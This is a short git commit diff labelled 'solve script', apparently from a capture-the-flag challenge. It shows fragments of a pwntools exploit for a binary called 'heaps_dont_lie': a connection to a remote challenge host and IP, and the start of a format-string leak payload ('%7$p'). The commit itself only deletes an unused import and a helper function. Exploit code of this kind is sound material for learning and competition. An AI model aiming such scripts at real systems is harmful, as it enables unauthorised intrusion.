solve script
This commit is contained in:
@@ -1,7 +1,6 @@
|
|||||||
#!/usr/bin/python3
|
#!/usr/bin/python3
|
||||||
|
|
||||||
from pwn import *
|
from pwn import *
|
||||||
import time
|
|
||||||
|
|
||||||
context.binary = target = ELF("./heaps_dont_lie", checksec=False)
|
context.binary = target = ELF("./heaps_dont_lie", checksec=False)
|
||||||
# r = process()
|
# r = process()
|
||||||
@@ -9,7 +8,6 @@ r = remote("94.72.112.248", 1244)
|
|||||||
|
|
||||||
# funcs
|
# funcs
|
||||||
s = lambda a: r.sendline(a)
|
s = lambda a: r.sendline(a)
|
||||||
ss = lambda a: r.send(a)
|
|
||||||
|
|
||||||
# leak
|
# leak
|
||||||
buf = b"%7$p"
|
buf = b"%7$p"
|
||||||
|
|||||||
Reference in New Issue
Block a user